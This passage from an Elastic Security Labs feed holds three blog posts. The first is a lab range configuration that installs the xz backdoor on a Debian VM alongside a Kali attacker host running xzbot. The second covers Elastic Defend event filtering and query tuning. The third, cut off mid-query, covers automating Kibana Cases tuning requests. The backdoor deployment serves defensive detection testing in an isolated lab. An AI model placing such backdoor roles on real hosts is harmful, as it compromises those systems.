<li><strong>We investigated:</strong> The specialized investigation tools, Event Analyzer and Session Viewer, were used to trace the <em>exact</em> attack paths on both Windows and Linux hosts.</li>
<li><strong>We automated:</strong> The &quot;force-multiplier&quot; of Elastic's GenAI stack was demonstrated, with Attack Discovery automatically correlating disparate alerts into a single attack and the AI Assistant accelerating the final investigation.</li>
<li><strong>We responded</strong>: The power of Elastic Workflows provide the brains and automation for complex response actions and remediation flows.</li>
</ol>
<p>This architecture is not a one-off build. It is a blueprint for a <em>continuous detection engineering pipeline</em>. It &quot;modernizes security operations&quot; by empowering purple teams to tear down, rebuild, and re-test their defenses on demand, ensuring their detection posture evolves as fast as the threats do.</p>
<h2><strong>Take the Next Step: Enable Your Security Team</strong></h2>
<p>The architecture in this blog is more than a technical exercise; it's a blueprint for continuous security validation. By pairing this automated range with Elastic’s unified SIEM and XDR platform, you can move from periodic testing to a state of constant readiness.</p>
<p><a href="https://cloud.elastic.co/registration">We invite you to start your own trial</a>, leverage this guide to test and evaluate the platform against real-world threats, and enable your security team with the tools to stay one step ahead of the adversary.</p>
<h3>Using another SIEM?</h3>
<p>No problem. You can leverage Elastic Serverless and augment your existing SIEM, then gain all of the insights above while using your native SIEM's underlying data. <a href="https://cloud.elastic.co/registration">Get started with an Elastic Serverless deployment today</a>. The <a href="https://www.elastic.co/kr/docs/solutions/security/ai/ease/ease-intro"><strong>Elastic AI SOC Engine (EASE)</strong> package</a> delivers these AI-driven capabilities, enabling organizations to rapidly add powerful analytics and an AI layer on top of their existing tools before the full migration.</p>
<h2>Appendix</h2>
<h3>Example Full Range</h3>
<p><em>Note: The Kali VM VLAN is outside of the GOAD and XZ backdoor hosts to simulate a segmented network or a remote attacker. The Kali VM VLAN can be changed to 10/20 to simulate “assumed breach” or internal attack scenarios.</em></p>
<pre><code>global_role_vars:
  ludus_elastic_fleet_server: &quot;https://&lt;fleet_domain&gt;:&lt;fleet_port&gt;&quot; #443 by default for cloud   ## Note on prem fleet server defaults to 8220
  ludus_elastic_agent_version: &quot;9.2.1&quot;
ludus:
  - vm_name: &quot;{{ range_id }}-GOAD-DC01&quot;
    hostname: &quot;{{ range_id }}-DC01&quot;
    template: win2019-server-x64-template
    vlan: 10
    ip_last_octet: 10
    ram_gb: 4
    cpus: 2
    windows:
      sysprep: true
    dns_rewrites:           # Any values in this array will be added to DNS for the range and return an A record for this VM's IP
      - sevenkingdoms.local
      - kingslanding.sevenkingdoms.local
      - kingslanding
    roles:
      - badsectorlabs.ludus_elastic_agent
    role_vars:
      ludus_elastic_enrollment_token: &quot;&lt;goad_policy_enrollment_token&gt;&quot;
  - vm_name: &quot;{{ range_id }}-GOAD-DC02&quot;
    hostname: &quot;{{ range_id }}-DC02&quot;
    template: win2019-server-x64-template
    vlan: 10
    ip_last_octet: 11
    ram_gb: 4
    cpus: 2
    windows:
      sysprep: true
    dns_rewrites:
      - winterfell.north.sevenkingdoms.local
      - north.sevenkingdoms.local
      - winterfell
    roles:
      - badsectorlabs.ludus_elastic_agent
    role_vars:
      ludus_elastic_enrollment_token: &quot;&lt;goad_policy_enrollment_token&gt;&quot;
  - vm_name: &quot;{{ range_id }}-GOAD-DC03&quot;
    hostname: &quot;{{ range_id }}-DC03&quot;
    template: win2016-server-x64-template
    vlan: 10
    ip_last_octet: 12
    ram_gb: 4
    cpus: 2
    windows:
      sysprep: true
    dns_rewrites:
      - essos.local
      - meereen.essos.local
      - meereen
    roles:
      - badsectorlabs.ludus_elastic_agent
    role_vars:
      ludus_elastic_enrollment_token: &quot;&lt;goad_policy_enrollment_token&gt;&quot;
  - vm_name: &quot;{{ range_id }}-GOAD-SRV02&quot;
    hostname: &quot;{{ range_id }}-SRV02&quot;
    template: win2019-server-x64-template
    vlan: 10
    ip_last_octet: 22
    ram_gb: 4
    cpus: 2
    windows:
      sysprep: true
    dns_rewrites:
      - castelblack.north.sevenkingdoms.local
      - castelblack
    roles:
      - badsectorlabs.ludus_elastic_agent
    role_vars:
      ludus_elastic_enrollment_token: &quot;&lt;goad_policy_enrollment_token&gt;&quot;
  - vm_name: &quot;{{ range_id }}-GOAD-SRV03&quot;
    hostname: &quot;{{ range_id }}-SRV03&quot;
    template: win2019-server-x64-template
    vlan: 10
    ip_last_octet: 23
    ram_gb: 4
    cpus: 2
    windows:
      sysprep: true
    dns_rewrites:
      - braavos.essos.local
      - braavos
    roles:
      - badsectorlabs.ludus_elastic_agent
    role_vars:
      ludus_elastic_enrollment_token: &quot;&lt;your_enrollment&gt;&quot;
  - vm_name: &quot;{{ range_id }}-xz-backdoor-dect&quot;
    hostname: &quot;{{ range_id }}-xz-backdoor-dect&quot;
    template: debian-12-x64-server-template
    vlan: 20
    ip_last_octet: 1
    ram_gb: 2
    cpus: 2
    linux:
      packages: # You can define packages to install on Linux hosts
        - ca-certificates
        - netcat-openbsd
        - net-tools
    roles:
      - badsectorlabs.ludus_xz_backdoor
      - badsectorlabs.ludus_elastic_agent
    role_vars:
      ludus_xz_backdoor_install_xzbot: true
      ludus_xz_backdoor_install_backdoor: true
      ludus_elastic_enrollment_token: &quot;&lt;linux_policy_enrollment_token&gt;&quot;
  - vm_name: &quot;{{ range_id }}-kali&quot;
    hostname: &quot;{{ range_id }}-kali&quot;
    template: kali-x64-desktop-template
    vlan: 50
    ip_last_octet: 99
    ram_gb: 8
    cpus: 4
    linux: true
    testing:
      snapshot: false # Snapshot this VM going into testing, and revert it coming out of testing. Default: true
      block_internet: false # Allow internet access for Kali, default is true
    roles:
      - badsectorlabs.ludus_xz_backdoor
      - badsectorlabs.ludus_elastic_agent
    role_vars:
      ludus_xz_backdoor_install_xzbot: true
      ludus_elastic_enrollment_token: &quot;&lt;linux_policy_enrollment_token&gt;&quot;
</code></pre>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/Security Labs Images 34.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[How Elastic Infosec Optimizes Defend for Cost and Performance]]></title>
            <link>https://www.elastic.co/kr/security-labs/how-elastic-infosec-optimizes-defend</link>
            <guid>how-elastic-infosec-optimizes-defend</guid>
            <pubDate>Tue, 27 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article details the internal Elastic Infosec team's process to optimize our endpoint data collection using Event Filtering and Advanced Policy Settings in Elastic Defend.]]></description>
            <content:encoded><![CDATA[<p>In the world of Security Operations Centers (SOCs), data is valuable, but excessive data can be problematic. Collecting every single event from every endpoint is expensive, unnecessary, and could lead to performance issues on your workstations and clusters. At Elastic, we treat our own InfoSec team as &quot;Customer Zero&quot;, we run the latest versions of all Elastic products, which includes deploying Elastic Defend on our entire fleet of workstations with all updates applied within 24 hours of a new version being released.</p>
<p>This article details the internal Elastic Infosec team's process to optimize our endpoint data collection. By leveraging <a href="https://www.elastic.co/kr/docs/solutions/security/manage-elastic-defend/event-filters">Event Filtering</a> and Advanced Policy Settings in <a href="https://www.elastic.co/kr/guide/en/security/current/install-endpoint.html"><strong>Elastic Defend</strong></a>, we significantly reduced noise, improved cluster performance, and saved on storage costs, all while maintaining a robust security posture. By following these strategies you can significantly reduce your EDR costs with only a few hours of work.</p>
<p>Elastic Defend is a powerful Endpoint Detection and Response agent that provides comprehensive protection against advanced threats. Elastic Defend offers a wide range of capabilities, including prevention, detection, and response, to safeguard your endpoints. In addition to on-host detections and alerting, its capabilities include rich event telemetry collected directly from the endpoint and sent to your Elastic stack, such as process executions, network connections, DNS events, USB Device Events, DLL and Driver loads, API events, file system changes, and registry modifications.
Elastic added default event filtering in 8.3.0+ that will automatically filter out known benign system events unless you disable it in the policy advanced settings. In addition to the built in filters, it is easy to add your own custom <a href="https://www.elastic.co/kr/docs/solutions/security/manage-elastic-defend/event-filters">Event Filtering</a> to Elastic Defend that will reduce your costs even further.</p>
<h2>The environment: Worldwide Distributed Workforce</h2>
<p>Our environment at Elastic isn't like most traditional enterprises. We are a remote first, distributed workforce with team members working remotely in over 43 countries around the world. Almost half of our employees are developers or engineers who are constantly pushing the boundaries of what an operating system can do. They are using Mac, Windows, and Linux workstations to compile software, build custom Linux kernels, run Elasticsearch clusters on Kubernetes on their workstations, and utilize complex development tools that can generate massive amounts of benign file and process activity.</p>
<p>When we initially rolled out Elastic Defend, our strategy was to first deploy to a small population of workstations from various different workcenters so we could get an idea of what the event volume looked like and filter out the noisiest events, and then gradually add more workstations each week. When we first installed Elastic Defend without any event filters we saw a very large volume of data, an average of 48k events per hour per workstation. A large amount of these events were being caused by benign but noisy management software such as Qualys, Jamf, inTune, etc. We needed a strategy to filter out the noise without creating blind spots for our security analysts.</p>
<h2>Step 1: Identifying the Noise</h2>
<p>When looking for noisy events there are generally two different categories of noise that you should look for:</p>
<ol>
<li>Software that is installed on the majority of your workstations.</li>
<li>A single host that is creating far more noise than your other hosts.</li>
</ol>
<p>When adding filters you will want to start with the first category of noise as that will make a bigger difference in the long run. A common cause of events like this are MDM agents or other applications that are constantly taking the same benign action such as writing to a log file and making network connections to ship logs to the cluster.</p>
<p>When a single host is creating significantly more events than other hosts it is often from a misconfiguration or a bug, in these cases the best solution is to fix the problem on the host. For example, we found a Linux system with a broken script that kept restarting and crashing thousands of times per second. Instead of adding an Event filter we reached out to the system owner and they fixed the script which also improved the performance of the system. If the events are caused by software installs that aren't on other hosts then event filters can be used to filter out for individual hosts. This will often be a single server such as a database or webserver causing a lot of network or file events compared to other systems.</p>
<p>We use the following ES|QL queries to pinpoint high-volume event categories, processes, and file paths. If you are using an older version of Elastic that does not support ES|QL you can use Lens visualizations in a similar way.</p>
<p>In the following ES|QL queries we use the logs-endpoint.events* index pattern. This is the default index pattern created by Elastic Defend for storing streamed events from endpoints. If you are using a custom configuration or cross cluster search this index pattern may be different.</p>
<p><strong>Noisiest Event Categories and Actions:</strong> Use this query to find the categories and actions that are creating the most alerts. This is a good starting point to show you where the noisiest events are that will have the biggest impact if they are filtered.</p>
<pre><code>FROM logs-endpoint.events*
| STATS event_count = count(*) BY event.category, event.action
| SORT event_count DESC
| LIMIT 10
| KEEP event.category, event.action, event_count
</code></pre>
<p><strong>10 Noisiest Hosts:</strong> This query is a good way to find your noisiest workstations or servers.</p>
<pre><code>FROM logs-endpoint.events*
| STATS event_count = count(*) BY host.id, host.name
| SORT event_count DESC
| LIMIT 10
| KEEP host.id, host.name, event_count
</code></pre>
<p><strong>Noisiest events on a single host:</strong> Once you've identified a noisy host, use this query to drill down and find the specific processes, command lines, or file paths driving that volume. You can use the <code>| WHERE host.id == &quot;{HOST_ID}&quot;</code> filter on any of the following queries to drill down on a single host events.</p>
<pre><code>FROM logs-endpoint.events*
| WHERE host.id == &quot;{HOST_ID}&quot;
| STATS event_count = count(*) BY event.category, event.action, process.name, process.command_line, file.path
| SORT event_count DESC
| LIMIT 10
| KEEP process.name, process.command_line, event.category, event.action, file.path, event_count
</code></pre>
<p><strong>Noisiest Process Names:</strong> Use this query to find which applications or system processes are responsible for the highest event volume globally across your fleet.</p>
<pre><code>FROM logs-endpoint.events*
| STATS event_count = count(*) BY process.name
| SORT event_count DESC
| LIMIT 10
| KEEP process.name, event_count
</code></pre>
<p><strong>Noisiest File Paths:</strong> Use this query to identify specific files or directories that are being accessed or modified frequently, often indicating logging or temporary file activity.</p>
<pre><code>FROM logs-endpoint.events*
| WHERE event.category == &quot;file&quot;
| STATS event_count = count(*) BY file.path, event.action
| SORT event_count DESC
| LIMIT 10
| KEEP file.path, event.action, event_count
</code></pre>
<p><strong>Top 10 Network Events by Process Name:</strong> Use this query to see which processes are generating the most network connection events, which can help identify chatty agents or services.</p>
<pre><code>FROM logs-endpoint.events*
| WHERE event.category == &quot;network&quot;
| STATS event_count = count(*) BY process.name
| SORT event_count DESC
| LIMIT 10
| KEEP process.name, event_count
</code></pre>
<p><strong>Top 10 Process Names by File Events:</strong> Use this query to identify which processes are generating the most file system noise, distinguishing them from other categories like network or registry events.</p>
<pre><code>FROM logs-endpoint.events*
| WHERE event.category == &quot;file&quot;
| STATS event_count = count(*) BY process.name
| SORT event_count DESC
| LIMIT 10
| KEEP process.name, event_count
</code></pre>
<h2>Step 2: Precise Event Filtering</h2>
<p>Armed with this data, we utilize <a href="https://www.elastic.co/kr/docs/solutions/security/manage-elastic-defend/event-filters"><strong>Event Filters</strong></a> in Elastic Defend. This feature allows you to prevent specific events from ever being sent to Elasticsearch, filtering them out directly at the endpoint. Filtering these events has no impact on the malware and host protections provided by Elastic Defend, it only stops these events from being sent to your cluster. This saves network bandwidth, disk storage, and CPU cycles on the workstations and ingest pipelines.</p>
<h3>Filter example 1: Elasticsearch file noise</h3>
<p>At Elastic we have a lot of users that run their own installations of Elasticsearch on their workstations as a way of doing testing or development. Elasticsearch will write files to disk very often as documents are ingested which can be quite noisy. Each filter is OS specific so you may need to create more than one version of some filters, this is an example of our MacOS version of this event filter:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/how-elastic-infosec-optimizes-defend/image3.png" alt="" /></p>
<h3>Filter example 2: Linux Logfile modifications</h3>
<p>On Linux systems log files are being constantly updated. This filter can be used to exclude all modification events when the <code>file.extension</code> is <code>log</code>. We would still receive events if a log file is created or deleted, but not when it is modified.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/how-elastic-infosec-optimizes-defend/image1.png" alt="Filter example 3: Docker running ps" /></p>
<p>On MacOS systems that have Docker installed the docker backend process will run <code>ps</code> regularly to get information about the containers running on the workstation. Across our collection of workstations we were seeing these events over 153 million times per month. This filter can be used to exclude those events from collection.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/how-elastic-infosec-optimizes-defend/image2.png" alt="" /></p>
<p><strong>Pro Tip:</strong> When applying filters, use the &quot;Comments&quot; field in the UI to document <em>why</em> a filter exists and link to the relevant ticket or investigation. This is crucial for long-term maintenance.</p>
<h2>Step 3: Optimizing Performance at the Source</h2>
<p>Beyond filtering, it is possible to make changes to the advanced settings of an Elastic Defend policy that will reduce the size of every event that is ingested. These advanced settings can reduce the number of events generated without sacrificing security. There are <a href="https://www.elastic.co/kr/docs/solutions/security/configure-elastic-defend/configure-data-volume-for-elastic-endpoint">several features</a> that help reduce the amount of data created by Elastic Agent.</p>
<p>Elastic Defend calculates MD5, SHA-1, and SHA-256 hashes for file events and alerts. Prior to 8.18 collecting all three hashes was enabled by default, but in 8.18 and newer the MD5 and SHA-1 hashes are disabled by default. These calculations consume workstation CPU cycles and cluster storage space calculating hashes that are unnecessary when we have the SHA-256 values.</p>
<p>If you have Elastic Agent prior to 8.18 and you want to disable these hash calculations, this is how you disable MD5 and SHA-1 collection in our integration policy settings:</p>
<ol>
<li>Navigate to <strong>Integration Policies</strong> -&gt; <strong>Elastic Defend</strong>.</li>
<li>Click <a href="https://www.elastic.co/kr/docs/reference/security/defend-advanced-settings"><strong>Show advanced settings</strong></a>.</li>
<li>Under <strong>Windows/macOS/Linux event settings</strong>, set these values to <code>false</code>:
<ul>
<li><code>windows.advanced.events.hash.md5</code></li>
<li><code>windows.advanced.events.hash.sha1</code></li>
<li><code>linux.advanced.events.hash.md5</code></li>
<li><code>linux.advanced.events.hash.sha1</code></li>
<li><code>macos.advanced.events.hash.md5</code></li>
<li><code>macos.advanced.events.hash.sha1</code></li>
</ul>
</li>
</ol>
<h3>Event Aggregation</h3>
<p>Another effective way to reduce data volume is by utilizing event aggregation. Elastic Defend automatically merges short-lived process and network events with the same values into a single event document. Without this setting every process would create three separate <code>start</code>, <code>fork</code>, <code>end</code> events. With this setting enabled these three events are combined into a single document if they happen within a few seconds of each other.</p>
<p>This is particularly useful for environments where processes spin up and shut down rapidly. This feature is enabled by default on 8.18 and newer versions of Elastic Defend, but it can be enabled on older versions using the advanced settings. You can control this behavior using the <a href="https://www.elastic.co/kr/docs/reference/security/defend-advanced-settings"><strong>advanced setting</strong></a> <code>[linux|mac|windows].advanced.events.aggregate_process</code>. We found that keeping these enabled significantly reduced our event count without impacting our ability to investigate incidents.</p>
<p><strong>The Impact:</strong></p>
<ul>
<li><strong>Reduced CPU Usage:</strong> The agent no longer spends cycles calculating three different hashes for every file event.</li>
<li><strong>Smaller Event Size:</strong> Removing these fields slightly reduced the size of every file event JSON document sent to Elasticsearch, compounding into significant storage savings over billions of events.</li>
</ul>
<h2>Results</h2>
<p>By implementing these changes, we transformed our detection environment:</p>
<ul>
<li><strong>Volume Reduction:</strong> We dropped from an average of ~48k events per host per hour to ~12k events per host per hour—a 75% reduction in noise.</li>
<li><strong>Cost Savings:</strong> Assuming an average size of 1kb per document ingested, reducing event volume by 36,000 documents per host per hour translates to a reduction of ingested logs by 3.5TB per day for our fleet of 4,000 hosts. This results in an estimated reduction of around 100TB per month in our Elastic cluster, saving our team thousands of dollars every month. The true savings amount can vary depending on your settings such as <a href="https://www.elastic.co/kr/guide/en/elasticsearch/reference/current/getting-started-index-lifecycle-management.html">ILM</a>, <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/using-logsdb-index-mode-with-elastic-security">logsdb</a>, <a href="https://www.elastic.co/kr/docs/manage-data/lifecycle/data-tiers#frozen-tier">frozen storage</a>, network transfer costs, cloud provider costs, and the hardware used in your cluster.</li>
<li><strong>Improved Signal:</strong> Our analysts now see fewer benign events which improves overall search speed and makes it easier to find the signal in the noise when hunting for threats.</li>
</ul>
<h2>Conclusion</h2>
<p>Automation and configuration tuning are powerful tools for any SOC, and they are essential for managing the rich telemetry provided by modern endpoint security solutions like Elastic Defend. Don't be intimidated by the volume of events collected; this visibility is your greatest asset in detecting advanced threats. By treating our internal security team as Customer Zero, we proved that you can aggressively filter noise and optimize configurations to save money and improve performance without compromising security. These changes not only reduced our storage footprint but also empowered our analysts to focus on what matters most: detecting and responding to real threats.</p>
<p>We encourage you to embrace the full capabilities of Elastic Defend. Don't be intimidated by the data—take control of your Endpoint data with event filters. Start by using <strong>ES|QL and Lens</strong> to identify your noisiest events, implement <strong>Event Filters</strong> to suppress benign activity, and review your <strong>Policy Settings</strong> to ensure you're only collecting the data you truly need. Ready to optimize your own environment? <a href="https://cloud.elastic.co/registration">Start your free trial</a> of Elastic Security today and experience the power of comprehensive endpoint protection.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/how-elastic-infosec-optimizes-defend/Security Labs Images 5.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Automating detection tuning requests with Kibana cases]]></title>
            <link>https://www.elastic.co/kr/security-labs/automating-detection-tuning-requests-with-kibana-cases</link>
            <guid>automating-detection-tuning-requests-with-kibana-cases</guid>
            <pubDate>Fri, 05 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how to automate detection rule tuning requests in Elastic Security. This guide shows how to add custom fields to Cases, create a rule to detect tuning needs, and use a webhook to create a frictionless feedback loop between analysts and detection engineers.]]></description>
            <content:encoded><![CDATA[<h2>Automating Detection Tuning Requests with Elastic Security</h2>
<p>At Elastic, the Infosec team is &quot;Customer Zero”. We use the newest version of Elastic products extensively to secure our organization, which gives us unique insights into how to solve real-world security challenges. One of the ways we've improved Security Operations Center (SOC) efficiency is by creating a seamless, automated workflow that allows our analysts to open a detection tuning request directly from <a href="https://www.elastic.co/kr/docs/solutions/security/investigate/open-manage-cases">Kibana Cases</a> with a single click.</p>
<p>In any SOC, the feedback loop between security analysts and detection engineers is crucial for maintaining a healthy and effective security posture. Analysts on the front lines are the first to see how detection rules perform in the real world. They know which alerts are valuable, which are noisy, and which could be improved with a bit of tuning. Alert fatigue from noisy alerts increases the risk of missing a true positive alert. Quickly tuning false positives is critical to responding to <em>true</em> positives. Capturing this alert feedback efficiently can be a challenge – manual processes, like sending emails, opening tickets, or direct messages can be inconsistent, time consuming, and hard to track.</p>
<p>With Elastic Security, an analyst can <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/add-detection-alerts-to-cases">attach alerts to a new or existing case</a> in Kibana, conduct their investigation, and with some customization and automation they can initiate a tuning request with a single click directly from <a href="https://www.elastic.co/kr/docs/solutions/security/investigate/open-manage-cases">Kibana Cases</a>. This article will walk you through how we built this automation, and how you can implement a similar system to close the feedback loop and optimize your detection and response program.</p>
<h2>Custom Fields in Kibana Cases</h2>
<p><a href="https://www.elastic.co/kr/docs/solutions/security/investigate/configure-case-settings#cases-ui-custom-fields">Custom fields</a> are a key component of this automation within the <a href="https://www.elastic.co/kr/docs/solutions/security/investigate/open-manage-cases">Kibana Cases</a>. Using these custom fields, we can capture the necessary information directly from the tool that the analysts are already using. These custom fields will appear on all new and existing cases, providing a clear and consistent way for analysts to flag a detection for review.</p>
<p>Note: The ability to add custom fields to cases was introduced in version 8.15. For more details, refer to the <a href="https://www.elastic.co/kr/docs/solutions/security/investigate/configure-case-settings#cases-ui-custom-fields">official Cases documentation</a>.</p>
<p>Every Kibana Case is a document stored in a dedicated Elasticsearch index: <code>.kibana_alerting_cases</code>. This means all your case data is available for querying, aggregation, and automation, just like any other data source in Elastic. Each case document contains a wealth of information, but a few fields are particularly useful for metrics and automation. The <code>cases.status</code> field tracks whether a case is open, in-progress, or closed, while <code>cases.created_at</code> and <code>cases.updated_at</code> provide timestamps crucial for calculating metrics like Mean Time to Resolution (MTTR). Fields like <code>cases.severity</code> and <code>cases.owner</code> allow you to slice and dice your metrics to see how the team is performing. Most importantly for this blog, the <code>cases.custom_fields</code> object contains an array of the custom fields you've configured. Runtime fields can be used to parse the array of custom fields, allowing you to build queries, dashboards, visualizations, and detection rules that trigger workflows.</p>
<p>Beyond tuning requests, custom fields are incredibly versatile for tracking metrics and enriching cases. For example, we have a &quot;<strong>Complex Case</strong>&quot; custom field to flag cases that take more than an hour to resolve, helping us identify rules that may need better investigation guides or automation to help reduce the investigation time. We also use custom fields like <strong>&quot;Detection rule valid&quot;</strong> and <strong>&quot;True Positive Alert&quot;</strong> to gather granular feedback on rule performance and fidelity, allowing us to build powerful dashboards in Kibana to visualize the operational effectiveness of our SOC.</p>
<p>If you have not already created a data view for the Cases information you will need to do that if you want to use runtime fields and data visualizations with your cases.</p>
<p><strong>Navigate to Index Patterns:</strong> In Kibana, go to Stack Management &gt; Data Views and click ‘create new data view’.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-detection-tuning-requests-with-kibana-cases/image4.png" alt="" /></p>
<p>Configure the Data view to map the <code>.kibana_alerting_cases</code> system index. You will need to click the <strong>Allow hidden and system indices</strong> button to allow this. For the timestamp field I recommend using the <code>cases.updated_at</code> field so the cases are displayed by the most recent activity.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-detection-tuning-requests-with-kibana-cases/image3.png" alt="" /></p>
<h2>Creating Custom fields</h2>
<p>There are two types of custom fields; <code>Text</code> fields for free-form input, or <code>Toggle</code> fields for simple yes/no feedback. For our Tuning Request automation, we use one of each. The text field is an optional field used to capture any additional feedback from the analyst, and the toggle field is used to trigger the automation.</p>
<p>In Kibana, go to Security &gt; Cases, then click on <strong>Settings</strong> in the top right. In the settings page you will see a <strong>Custom Fields</strong> section where you can add the new fields you want. The fields are displayed in the cases UI in alphabetical order so we prefix our fields with numbers to keep them in the order we want.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-detection-tuning-requests-with-kibana-cases/image5.png" alt="" /></p>
<p>You can create the new custom fields, the Labels added in the UI are only for the analysts and are not stored in the cases index. These can be any value you want.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-detection-tuning-requests-with-kibana-cases/image1.png" alt="" /></p>
<p><strong>Add Custom Fields:</strong> We need two fields for this workflow.</p>
<ul>
<li><strong>Field 1:</strong> Tuning Required Toggle
<ul>
<li>
<p>This will be the button analysts click to initiate a tuning request.</p>
<ul>
<li><strong>Label:</strong> <code>Open tuning request?</code></li>
<li><strong>Type:</strong> Toggle</li>
<li><strong>Default Value:</strong> Off</li>
</ul>
</li>
<li>
<p><strong>Field 2:</strong> Tuning Request Details</p>
<ul>
<li>This field allows the analyst to provide specific details about what needs to be changed, such as adding an exception, lowering the severity, or adjusting the query logic.</li>
<li><strong>Name:</strong> <code>Tuning request detail</code></li>
<li><strong>Type:</strong> Text</li>
</ul>
</li>
<li>
<p><strong>Default Value:</strong> Off</p>
</li>
</ul>
</li>
</ul>
<h2>Using Runtime fields to map the custom fields</h2>
<p>A challenge when working with custom fields in Kibana Cases is that the <code>cases.custom_fields</code> field is mapped as an array of objects, where each object represents a custom field with its name and value. This structure makes it difficult to query for specific custom fields directly in KQL. For example, you can't simply use a query like <code>cases.custom_fields.open_tuning_request : &quot;true&quot;</code>. To overcome this, we can use <a href="https://www.elastic.co/kr/docs/manage-data/data-store/mapping/runtime-fields">runtime fields</a> to parse and query the custom fields.</p>
<p>Runtime fields are fields that are evaluated at query time. They allow you to create new fields on the fly without having to reindex your data. We can define runtime fields on the <code>.kibana_alerting_cases</code> index to use a painless script to parse the <code>cases.custom_fields</code> array and extract the values we need into new, easily queryable fields.</p>
<p>For this workflow, we'll create two runtime fields that will map to the custom fields created above:<br />
*   <code>TuningRequired</code>: A boolean field that will be <code>true</code> if the &quot;Open tuning request&quot; toggle is on.<br />
*   <code>TuningDetail</code>: A text field that will contain the analyst's comments from the &quot;Tuning request detail&quot; field.</p>
<p>Before we can create the runtime fields, we first need to identify the unique ID (<code>key</code>) that Kibana assigns to each custom field. Currently, there isn't a straightforward way to view this ID in the UI. To find it, we used the following workaround:</p>
<ol>
<li><strong>Create the Fields.</strong> If you are using other custom fields you should create the custom fields one at a time to make it easier to identify the new field keys. If you only have the two fields mentioned above you can tell them apart using the <code>type</code> value which can be either text or toggle.</li>
<li><strong>Create a new case.</strong> After adding the field, we created a test case in Kibana and added some data to the description field and toggled the tuning required field to true with all other custom fields set to false or blank.</li>
<li><strong>Inspect the case document.</strong> We then navigated to Discover and queried the <code>.kibana_alerting_cases</code> index to find the document for the new case. By inspecting the <code>cases.customFields</code> array in the document's source, we could find the <code>key</code> associated with our new custom field. Save the values of the <code>key</code> fields to be used in the runtime scripts.</li>
</ol>
<p>The <code>cases.customFields</code> data is formatted like this:</p>
<pre><code class="language-yaml">  [
    {
      &quot;key&quot;: &quot;4537b921-3ca4-4ff0-aa39-02dd6a3177bd&quot;,
      &quot;type&quot;: &quot;text&quot;,
      &quot;value&quot;: &quot;This alert is too noisy&quot;
    },
    {
      &quot;key&quot;: &quot;cdf28896-c793-43d2-9384-99562e23a646&quot;,
      &quot;type&quot;: &quot;toggle&quot;,
      &quot;value&quot;: true
    }
  ]
</code></pre>
<h3>Creating the Runtime Fields</h3>
<p>You can add runtime fields through the Kibana UI or by using the Elasticsearch API in the Dev Tools console. If you have not already created a data view for the Cases information you will need to do that first.</p>
<p>While viewing the new Kibana Cases Data view click the ‘Add Field’ button to open the flyout menu to create a new runtime field.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-detection-tuning-requests-with-kibana-cases/image7.png" alt="" /></p>
<p>Enter the name of the field, in this example we are configuring <code>TuningRequired</code> as a new Boolean field type. Click the ‘Set Value’ toggle to configure this as a new Runtime field configured via a painless script. Update this painless script to replace <code>TUNING_REQUIRED_FIELD_KEY_UUID</code> with the <code>key</code> value from the Tuning Required custom field and paste it into the value field and save the new runtime field.</p>
<pre><code class="language-javascript">...
    if (params._source.containsKey('cases') &amp;&amp;
    params._source.cases != null &amp;&amp;
    params._source.cases.containsKey('customFields') &amp;&amp;
    params._source.cases.customFields != null) 
{
  for (def cf : params._source.cases.customFields) {
    if (cf != null &amp;&amp;
        cf.containsKey('key') &amp;&amp;
        cf.key != null &amp;&amp;
        cf.key.contains('TUNING_REQUIRED_FIELD_KEY_UUID') &amp;&amp;
        cf.containsKey('value') &amp;&amp;
        cf.value != null) {
      emit(cf.value);
      break;
    }
  }
}
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-detection-tuning-requests-with-kibana-cases/image6.png" alt="" /></p>
<p>Repeat this process for the <code>TuningDetail</code> field, remember to use the <code>key</code> value from the text field in this field’s painless script. If you have any additional custom fields in your cases that you want to use for dashboards or metrics you can map those as well with this same process.</p>
<p>If you control your cluster settings and data views ‘as code’ you can also add runtime fields to an index mapping using the <a href="https://www.elastic.co/kr/guide/en/elasticsearch/reference/current/indices-put-mapping.html">Update mapping API</a> from the Kibana Dev Tools console.</p>
<h2>Automating the tuning request creation</h2>
<p>We can trigger this automation in two ways: through a custom detection rule (that will create a new alert and send it to a connector when a case is updated with a tuning request) or via a scheduled external automation that queries the API.</p>
<p>This automation can be created using any automation platform such as Tines, Github Actions, or custom scripting. This is the logic we use for our automation:</p>
<h3>Step 1: Find any cases recently tagged as <code>TuningRequired</code></h3>
<p>You can use this elasticsearch query to find any cases that have been updated within the last hour where the <code>TuningRequired</code> field has been set to <code>true</code>. This query uses the <code>cases.updated_at</code> field as the time range. The runtime field mappings must be included in the API request to query the custom fields.</p>
<p>This query will return all of the case documents from the <code>.kibana_alerting_cases</code> index that have been updated in the last hour and the <code>TuningRequired</code> field has been set to <code>true</code></p>
<pre><code class="language-yaml">POST /.kibana_alerting_cases/_search  
{  
  &quot;query&quot;: {  
    &quot;bool&quot;: {  
      &quot;must&quot;: [],  
      &quot;filter&quot;: [  
        {  
          &quot;bool&quot;: {  
            &quot;should&quot;: [  
              {  
                &quot;match&quot;: {  
                  &quot;TuningRequired&quot;: true  
                }  
              }  
            ],  
            &quot;minimum_should_match&quot;: 1  
          }  
        },  
        {  
